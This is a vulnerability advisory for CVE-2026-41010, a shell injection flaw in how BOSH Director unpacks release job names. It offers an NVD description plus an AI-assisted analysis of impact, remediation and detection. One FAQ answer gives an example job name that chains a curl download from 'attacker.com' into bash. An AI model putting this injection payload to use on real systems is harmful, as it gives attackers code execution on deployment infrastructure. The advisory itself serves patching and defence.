CVE-2026-41010: BOSH Director Shell Injection via Release Job Names
BOSH Director is vulnerable to arbitrary command execution when processing uploaded release tarballs. An attacker with elevated privileges can craft a malicious release manifest that embeds shell metacharacters in a job name. When the system unpacks the tarball, these characters are interpreted by the shell, allowing the attacker to execute arbitrary commands with the privileges of the BOSH Director process. The vulnerability stems from unsafe string interpolation of untrusted input directly into a shell command.
Source data · NVD / CISA · public domain
- CVSS
- 3.1 · 8.2 HIGH · CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
- Weaknesses (CWE)
- CWE-78
- Affected products
- 0 configuration(s)
- Published / Modified
- 2026-06-04 / 2026-06-17
NVD description (verbatim)
ReleaseJob#unpack builds job_dir = File.join(@release_dir, 'jobs', name) and job_tgz = File.join(@release_dir, 'jobs', "#{name}.tgz") where name returns @job_meta['name'], a value taken verbatim from the jobs: array of the attacker-supplied release.MF inside the uploaded tarball. These paths are then interpolated into a shell string: Bosh::Common::Exec.sh("tar -C #{job_dir} -xf #{job_tgz} 2>&1", :on_error => :return). Bosh::Common::Exec.sh executes via %x{#{command}} (bosh-common/lib/bosh/common/exec.rb:53), i.e. /bin/sh -c, so any shell metacharacters in name are interpreted. FileUtils.mkdir_p(job_dir) on line 49 creates the literal directory (no shell) and succeeds even when the name contains $()/;, so execution reaches the sh call. Affected versions: - BOSH Director: all versions prior to v282.1.12 (inclusive); fixed in v282.1.12 or later
1 reference(s) · View on NVD →
SEC.co analysis · AI-assisted, reviewed against source
Technical summary
CVE-2026-41010 is a shell injection vulnerability in BOSH Director's ReleaseJob#unpack method. The flaw occurs because job names from the attacker-supplied release.MF manifest file are interpolated directly into a tar extraction command executed via /bin/sh. While FileUtils.mkdir_p creates directories safely (interpreting the path literally), the subsequent Bosh::Common::Exec.sh call processes the same unsanitized name through shell execution via %x{} interpolation. An attacker can inject shell metacharacters (such as $(), backticks, semicolons, or pipes) in the job name field to break out of the intended tar command and execute arbitrary shell code. This affects all BOSH Director versions prior to v282.1.12.
Business impact
Successful exploitation allows an authenticated attacker with high privileges to gain code execution on BOSH Director systems, potentially compromising the entire deployment infrastructure. BOSH Director manages infrastructure automation and orchestration across cloud deployments; compromise enables lateral movement, data theft, manipulation of deployments, and persistence mechanisms. Organizations relying on BOSH for infrastructure as code face significant operational and security risk if their Directors are unpatched.
Affected systems
BOSH Director versions prior to v282.1.12 are vulnerable. The attack requires an attacker to upload a malicious release tarball, which presupposes authenticated access with release upload privileges—typically a high-privilege user role. No unauthenticated remote exploitation is possible; however, insider threats or compromised administrative accounts pose substantial risk.
Exploitability
Exploitation requires high-privilege authentication (release management/administrator role) and the ability to upload a crafted tarball. Once those conditions are met, the attack is straightforward: inject shell metacharacters into the job name field of the release manifest. The shell interprets these characters reliably, and no additional user interaction or race conditions are needed. While not remotely unauthenticated, the attack is technically simple and reliable against vulnerable versions.
Remediation
Upgrade BOSH Director to v282.1.12 or later. The patched version sanitizes job names before shell interpolation, preventing metacharacter injection. Organizations should prioritize patching given the high severity and the role BOSH plays in infrastructure automation. Before patching, implement access controls to restrict who can upload releases to BOSH Director.
Patch guidance
Update BOSH Director to v282.1.12 or a later release. Verify the upgrade in a test environment first to ensure compatibility with your deployment configuration. After upgrade, restart the BOSH Director service and validate that existing releases and deployments continue to function. Check the official BOSH release notes for any breaking changes or additional migration steps.
Detection guidance
Monitor BOSH Director logs for failed or suspicious tar extraction operations, especially those with unusual job names containing shell metacharacters ($, backticks, semicolons, pipes, etc.). Watch for unexpected child processes spawned by the BOSH Director process during release uploads. Implement file integrity monitoring on the release directory to detect unauthorized file creation. In high-security environments, enable shell command auditing (auditd on Linux) to capture injected commands.
Why prioritize this
This vulnerability scores 8.2 (HIGH) due to high impact (confidentiality, integrity, and availability all compromised), but requires high privilege to exploit. Organizations should prioritize patching based on their access control posture: if release upload privileges are tightly restricted to trusted administrators, risk is lower; if access is broader or if insider threats are a concern, treat as urgent. The ease of exploitation once authenticated argues for expedited patching across all environments.
Risk score, explained
CVSS 3.1 score of 8.2 reflects the combination of local attack vector (releases are uploaded to Director), high privilege requirement (PR:H), absence of user interaction (UI:N), and complete impact across confidentiality, integrity, and availability (C:H, I:H, A:H). The score appropriately captures that while authentication is required, the consequences of compromise are severe. The scope change (S:C) indicates that compromising the Director affects other systems it orchestrates.
Frequently asked questions
Do we need to patch immediately if we have strict administrative controls on release uploads?
Prioritize patching within your next maintenance window. While high privilege is required, the ease of exploitation once authenticated makes this a critical risk. If administrative access is compromised, the impact is severe. Additionally, future security research or insider threats may increase risk; patching eliminates the vector entirely.
Can we detect if this vulnerability has been exploited in our BOSH Director logs?
Look for tar extraction errors with unusual job names, unexpected shell command execution in BOSH Director process logs, or file creation in unexpected locations during release uploads. However, logs may be incomplete if the attacker had administrative access. Combine log analysis with file integrity checks and process auditing for stronger detection.
Does this affect BOSH agents on deployed VMs, or only the Director itself?
Only BOSH Director is affected. The vulnerability is in the Director's release unpacking logic. BOSH agents on deployed VMs are not directly vulnerable, though a compromised Director could potentially be used to push malicious deployments to those agents.
What is the attack vector in practical terms?
An attacker with high-privilege BOSH access (e.g., release manager role, or someone who has compromised such credentials) uploads a release tarball with a malicious job name like `test; curl attacker.com/malware.sh | bash;`. The Director unpacks the release, the job name is embedded in a shell command, and the injected command executes.
This analysis is based on the CVE description and publicly available information as of the publication date. CVSS scores, patch versions, and vendor advisories should be verified against official sources. Exploitation details provided are for educational and defensive purposes only. Organizations should conduct their own risk assessment in the context of their specific BOSH deployments, access controls, and threat models. Source: NVD (public-domain), retrieved 2026-07-07. Analysis generated by SEC.co (claude-haiku-4-5).
Weaknesses (CWE)
Related vulnerabilities
- CVE-2025-41265HIGHWaterfall WF-500 TX Host OS Command Injection (CVSS 7.2)
- CVE-2025-41266HIGHWaterfall WF-500 TX Host Command Injection Vulnerability Analysis
- CVE-2025-41267HIGHWaterfall WF-500 TX Host Command Injection Vulnerability
- CVE-2025-41279HIGHOS Command Injection in Waterfall WF-500 RX Host Administration WebUI
- CVE-2025-41281HIGHWaterfall WF-500 OS Command Injection
- CVE-2025-69755HIGHNeterbit NW-431F Router RCE and Data Exposure Vulnerability
- CVE-2026-10214HIGHCommand Injection in chatgpt-on-wechat Bash Tool
- CVE-2026-10219HIGHGoClaw Command Injection Vulnerability